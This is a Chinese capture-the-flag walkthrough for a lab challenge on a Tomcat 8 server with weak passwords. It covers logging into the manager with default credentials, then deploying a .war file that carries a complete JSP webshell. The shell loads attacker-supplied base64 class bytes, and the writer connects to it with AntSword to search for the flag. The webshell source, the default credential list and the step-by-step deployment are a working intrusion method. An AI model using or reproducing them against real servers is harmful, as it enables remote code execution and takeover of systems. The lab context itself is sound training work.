安鸾渗透实战平台（中间件）tomcat8弱口令 (100分)_中间件弱口令

漏洞环境

安鸾渗透实战平台
蚂剑
一句话木马（jsp）

题目：

访问对应站点

1、访问站点

2、尝试登录
http://106.15.50.112:18081/manager/status
tomcat弱口令登录，常规：root:root；admin:admin；tomcat:tomcat；

这里使用tomcat；tomcat登录成功

3、找到部署点
http://106.15.50.112:18081/manager/html/list

准备一句话木马

1、编写一句话木马（密码是passwd）

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

2、把他改格式为.jsp并使用压缩软件压成zip后再把他该成.war

网页端上传

上传后提示文件存在

改个名字

上传成功
这里也会多一个目录
由于马是在该目录下解压的，我们就访问对应url就行，白板证明有效
http://106.15.50.112:18081/zzzz/zzzz.jsp

使用蚁剑链接


？？？？说好在根目录下呢，中国人不骗中国人！！

那就用蚁剑的命令行用find来找吧，非要前后加通配符才找到…

find / -name *flag*
1